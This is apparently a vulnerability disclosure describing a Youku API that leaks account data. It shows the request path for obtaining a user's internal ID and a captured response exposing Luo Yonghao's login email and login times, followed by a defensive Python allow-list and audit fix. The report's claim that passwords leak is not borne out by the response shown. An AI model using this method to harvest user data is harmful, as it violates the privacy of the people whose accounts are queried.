Youku's API does not apply any strict business-logic design when returning user information: it outputs the user's email address, username, password, login IP, mobile number, QQ, MSN and other sensitive fields directly.
#1 Visit Luo Yonghao's (老罗) personal homepage
http://i.youku测试数据/u/id_UMTcwMjk0NA==
#2 The homepage automatically requests the following API to fetch the page-view count of the user's homepage
http://i.youku测试数据/user_pv/id_425736_md5_1e522f6831febf75e033cfe26fd0cec4_time_1372057646.html
In id_425736_md5, the number after id is the user's real internal user ID
# Construct a request to fetch the user's data
# A test account is used for the demonstration here
{"userId":"425736","userName":"\u8001\u7f57","name":null,"regDate":"2006-11-04 10:06:54","contentTotal":"28","scoreTotal":"380","favTotal":"0","friendTotal":"0","pkTotal":"3091716","clubTotal":"0","gender":"0","city":"1","birthDay":"0000-00-00","birthDayDesc":"\u65e0\u678160","icon":"100","pvTotal":"391291","orderBy":null,"lastLoginDate":"2006-11-04 10:06:54","lastLoginDateDesc":"6\u5e74\u524d","statValue":null,"subTotal":null,"userSet":"23","email":"laol@youku测试数据","returnType":null,"icon64":"","icon150":"","iconUpdateTime":null,"contentFavTotal":"13159","ecdUserId":"UMTcwMjk0NA==","genderDesc":"\u7537","cityDesc":"\u5317\u4eac\u5e02","QQ":"","MSN":"","intro":"","status":"1","contentPvTotal":"15564997","messageTotal":"0","subscribeTotal":"0","folderTotal":"1","folderPvTotal":0},"info":{"email_status":0,"uid":425736,"reason":null,"status":0,"nickname":"\u8001\u7f57","bflag":0,"from":null,"nameCheckStatus":0,"ctime":1319188273080,"username":"\u8001\u7f57","email":"laol@youku测试数据","domain":"","tmpEmail":"","oldUsername":null,"login":1371969255588,"nameVersion":0,"mobile":""},"verified_icon":1,"encode_id":"UMTcwMjk0NA==","is_self":false,"login_user_id":"65214337","login_user_encode_id":"UMjYwODU3MzQ4","it":"\u4ed6","is_official":false,"rolltips":0,"firstrunGuide":1,"firstrunGuidee":2,"firstrunGuideee":0,"favtips":0,"canuseboard":1,"canusebanner":1,"board":{"state":0,"content":""},"mod":{"m_headline":1,"m_video":1,"m_playlist":1,"m_favorite":1,"m_statuses":1,"m_user":1,"m_guestbook":1,"m_friend":1,"m_follower":1,"m_visitor":1,"id":425736,"m_address":1},"pvtime":1372064276,"pvmd5":"79cdb02deead4aede3cf7c4fa8547ac7"}}
The login email obtained for Luo Yonghao is: laol@youku测试数据
Fix:
Information that should not be output should, as far as possible, not be output at all.
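One way to put that fix into practice is to build the profile response from an explicit allow-list rather than dumping the full account record, and to audit responses for fields that must not leak. This is an added example, not Youku's code; the sample record is constructed to mirror the shape of the response above, and the outer "user" key and the field lists are assumptions.

```python
import json

# Fields a public profile page legitimately needs (assumed allow-list, not Youku's own).
PUBLIC_FIELDS = {"userId", "userName", "regDate", "contentTotal", "pvTotal",
                 "genderDesc", "cityDesc", "intro", "icon", "ecdUserId"}
# Fields the account owner may see about themselves, but no other visitor.
OWNER_ONLY_FIELDS = {"email", "mobile"}
# Fields the report shows being exposed that must never reach another user's browser.
SENSITIVE_FIELDS = {"email", "tmpEmail", "mobile", "QQ", "MSN", "login", "lastLoginDate"}

# Constructed sample shaped like the leaky response in the report (values are made up).
LEAKY_RESPONSE = {
    "user": {"userId": "425736", "userName": "老罗", "regDate": "2006-11-04 10:06:54",
             "pvTotal": "391291", "lastLoginDate": "2006-11-04 10:06:54",
             "email": "user@example.invalid", "QQ": "", "MSN": "", "genderDesc": "男",
             "cityDesc": "北京市", "ecdUserId": "UMTcwMjk0NA=="},
    "info": {"uid": 425736, "username": "老罗", "email": "user@example.invalid",
             "tmpEmail": "", "mobile": "", "login": 1371969255588},
    "is_self": False,
}


def public_view(raw: dict, is_self: bool = False) -> dict:
    """Build the profile-page response from the full record using an allow-list.
    Everything not explicitly allowed is dropped, including the nested account
    "info" block; owner-only fields are added only when the viewer is the owner."""
    user = raw.get("user", {})
    allowed = PUBLIC_FIELDS | (OWNER_ONLY_FIELDS if is_self else set())
    return {k: user[k] for k in allowed if k in user}


def audit_response(body) -> set:
    """Return the sensitive keys present anywhere in a response (dict or JSON string).
    Key presence is flagged even when the value is empty, because an empty "QQ"
    today becomes a real one as soon as the user fills it in."""
    data = json.loads(body) if isinstance(body, str) else body
    found = set()

    def walk(node):
        if isinstance(node, dict):
            for k, v in node.items():
                if k in SENSITIVE_FIELDS:
                    found.add(k)
                walk(v)
        elif isinstance(node, list):
            for v in node:
                walk(v)

    walk(data)
    return found
```

Running audit_response over the raw record flags every leaked key, while the allow-listed view for a non-owner flags nothing.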